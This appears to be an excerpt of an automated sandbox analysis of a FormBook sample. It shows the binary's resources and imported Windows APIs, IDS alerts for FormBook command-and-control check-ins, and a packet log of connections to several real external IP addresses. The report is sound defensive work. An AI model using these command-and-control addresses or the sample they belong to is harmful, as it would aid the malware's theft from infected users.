                | RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
                | RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
                | RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
                | RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
                | RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
                | RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
                | RT_RCDATA | 0xdc7b8 | 0x5131a | data |  |  | 1.0003337643202934 |
                | RT_GROUP_ICON | 0x12dad4 | 0x76 | data | English | Great Britain | 0.6610169491525424 |
                | RT_GROUP_ICON | 0x12db4c | 0x14 | data | English | Great Britain | 1.25 |
                | RT_GROUP_ICON | 0x12db60 | 0x14 | data | English | Great Britain | 1.15 |
                | RT_GROUP_ICON | 0x12db74 | 0x14 | data | English | Great Britain | 1.25 |
                | RT_VERSION | 0x12db88 | 0x10c | data | English | Great Britain | 0.6007462686567164 |
                | RT_MANIFEST | 0x12dc94 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
                | DLL | Import |
                | --- | --- |
                | WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
                | VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
                | WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
                | COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
                | MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
                | WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
                | PSAPI.DLL | GetProcessMemoryInfo |
                | IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
                | USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
                | UxTheme.dll | IsThemeActive |
                | KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW |
                | USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient |
                | GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath |
                | COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
                | ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW |
                | SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
                | ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
                | OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture |
                | Language of compilation system | Country where language is spoken |
                | --- | --- |
                | English | Great Britain |
                Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                2024-08-23T04:20:41.281611+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                2024-08-23T04:21:00.064857+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49765 | 80 | 192.168.2.4 | 213.145.228.16
                2024-08-23T04:18:27.482705+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                2024-08-23T04:19:44.582620+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49749 | 80 | 192.168.2.4 | 43.252.167.188
                2024-08-23T04:19:15.545135+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                2024-08-23T04:20:54.962325+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49763 | 80 | 192.168.2.4 | 213.145.228.16
                2024-08-23T04:21:13.440847+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49769 | 80 | 192.168.2.4 | 91.195.240.19
                2024-08-23T04:19:36.939695+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                2024-08-23T04:18:43.216056+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                2024-08-23T04:20:08.147806+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                2024-08-23T04:21:08.372143+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49767 | 80 | 192.168.2.4 | 91.195.240.19
                2024-08-23T04:20:10.695239+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49756 | 80 | 192.168.2.4 | 23.251.54.212
                2024-08-23T04:19:39.479593+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                2024-08-23T04:21:33.147887+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49772 | 80 | 192.168.2.4 | 172.67.210.102
                2024-08-23T04:19:52.981754+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                2024-08-23T04:19:58.472511+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                2024-08-23T04:21:05.837189+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49766 | 80 | 192.168.2.4 | 91.195.240.19
                2024-08-23T04:20:43.986058+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49760 | 80 | 192.168.2.4 | 199.192.19.19
                2024-08-23T04:20:57.530827+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49764 | 80 | 192.168.2.4 | 213.145.228.16
                2024-08-23T04:19:50.401644+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                2024-08-23T04:19:55.506439+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                2024-08-23T04:20:33.106164+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49757 | 80 | 192.168.2.4 | 23.251.54.212
                2024-08-23T04:20:52.510744+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49762 | 80 | 192.168.2.4 | 213.145.228.16
                2024-08-23T04:18:48.408334+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                2024-08-23T04:19:42.073478+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49748 | 80 | 192.168.2.4 | 43.252.167.188
                2024-08-23T04:19:18.178646+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                2024-08-23T04:20:39.664204+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49758 | 80 | 192.168.2.4 | 199.192.19.19
                2024-08-23T04:21:10.944772+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49768 | 80 | 192.168.2.4 | 91.195.240.19
                2024-08-23T04:17:48.756945+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49773 | 80 | 192.168.2.4 | 172.67.210.102
                2024-08-23T04:19:13.014934+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                2024-08-23T04:21:28.069753+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49770 | 80 | 192.168.2.4 | 172.67.210.102
                2024-08-23T04:21:30.603596+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49771 | 80 | 192.168.2.4 | 172.67.210.102
                2024-08-23T04:18:51.068512+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                2024-08-23T04:20:05.444683+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                2024-08-23T04:18:45.757577+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                2024-08-23T04:20:46.356118+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49761 | 80 | 192.168.2.4 | 199.192.19.19
                2024-08-23T04:19:22.189090+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Aug 23, 2024 04:18:26.793268919 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                Aug 23, 2024 04:18:26.798206091 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                Aug 23, 2024 04:18:26.798475027 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                Aug 23, 2024 04:18:26.800393105 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                Aug 23, 2024 04:18:26.805284977 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                Aug 23, 2024 04:18:27.482528925 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                Aug 23, 2024 04:18:27.482589960 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                Aug 23, 2024 04:18:27.482705116 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                Aug 23, 2024 04:18:27.485311985 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                Aug 23, 2024 04:18:27.490242958 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                Aug 23, 2024 04:18:42.561813116 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:42.567975044 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:42.568057060 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:42.569592953 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:42.575620890 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:43.215931892 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:43.215981960 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:43.216056108 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:44.085679054 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:45.104232073 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:45.109286070 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:45.109375954 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:45.111944914 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:45.116822958 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:45.757328987 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:45.757520914 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:45.757576942 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:46.616367102 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:47.634521008 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:47.760646105 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.760787964 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:47.762895107 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:47.767767906 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.767858028 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.767887115 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.767935038 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.767961979 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.767992020 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.768136978 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.768163919 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:47.768191099 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:48.408241034 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:48.408277988 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:48.408334017 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:49.272648096 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:50.291173935 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:50.296211004 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:50.296318054 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:50.297837019 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:50.302719116 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:51.068322897 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:51.068382978 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:51.068412066 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:18:51.068511963 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:51.071250916 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.106
                Aug 23, 2024 04:18:51.076122999 CEST | 80 | 49740 | 217.160.0.106 | 192.168.2.4
                Aug 23, 2024 04:19:12.543663979 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:12.548429966 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:12.548500061 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:12.550000906 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:12.555598974 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:13.014857054 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:13.014934063 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:14.062767982 CEST | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:14.067703009 CEST | 80 | 49742 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:15.072417021 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:15.077240944 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:15.077349901 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:15.078872919 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:15.083606958 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:15.544964075 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:15.545135021 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:16.585267067 CEST | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:16.592196941 CEST | 80 | 49743 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.603682041 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:17.608678102 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.608767033 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:17.611164093 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:17.616004944 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616017103 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616050005 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616059065 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616096020 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616244078 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616252899 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616301060 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:17.616308928 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:18.178447962 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:18.178646088 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:19.116550922 CEST | 49744 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:19.121505976 CEST | 80 | 49744 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:20.134557962 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:20.139539957 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:20.142462969 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:20.144239902 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:20.152019024 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.188949108 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.188982010 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.188999891 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189014912 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189033031 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189047098 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189060926 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189074993 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189088106 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189090014 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.189105988 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.189125061 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
